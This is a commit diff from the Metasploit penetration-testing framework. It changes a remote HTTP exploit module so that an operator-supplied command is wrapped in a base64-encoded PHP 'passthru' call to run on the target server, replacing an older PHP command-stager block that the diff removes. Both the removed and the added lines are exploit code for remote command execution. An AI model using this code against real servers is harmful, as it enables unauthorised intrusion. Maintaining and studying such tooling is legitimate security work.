Module is busted when it loads, restoring to the original method. Mixin should not be loaded into an exploit
git-svn-id: file:///home/svn/framework3/trunk@14061 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9cb54e37c5
commit
7ba5a8ec4e
|
@ -15,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Payload::Php
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -109,16 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# if we are using the exec CMD stager
|
||||
# important to check which php functions are disabled
|
||||
if datastore['CMD']
|
||||
cmd = Rex::Text.encode_base64(datastore['CMD'])
|
||||
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
out = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
shell = <<-END_OF_PHP_CODE
|
||||
$c = base64_decode("#{cmd}");
|
||||
#{php_preamble({:disabled_varname => dis})}
|
||||
#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis, :output_varname => out})}
|
||||
echo #{out};
|
||||
END_OF_PHP_CODE
|
||||
p = Rex::Text.encode_base64(Rex::Text.compress(shell))
|
||||
p = "passthru(\"%s\");" % datastore['CMD']
|
||||
p = Rex::Text.encode_base64(p)
|
||||
else
|
||||
p = Rex::Text.encode_base64(payload.encoded)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue